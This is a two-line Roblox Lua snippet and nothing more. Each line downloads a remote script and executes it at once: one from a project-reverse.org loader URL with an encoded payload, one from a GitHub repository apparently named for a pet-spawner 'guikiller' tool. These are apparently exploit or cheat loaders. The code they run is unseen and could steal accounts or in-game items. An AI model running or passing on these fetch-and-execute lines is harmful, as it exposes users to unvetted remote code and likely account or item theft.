loadstring(game:HttpGet("https://api.project-reverse.org/run/eyJpZCI6ImYwOGRlN2NhLTMyMWQtNGU1Ni1hNGU1LWI1NDZlY2JlMWEzZCIsImtpbmQiOiJsb2FkZXIiLCJ2aXN1YWwiOnsiaWQiOiJjdXN0b20iLCJ1cmwiOiJodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vR0FHU2NyaXB0VjMvZ3VpL3JlZnMvaGVhZHMvbWFpbi9sdWEifX0"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/PetSpawnerV99/guikiller/refs/heads/main/locker"))()
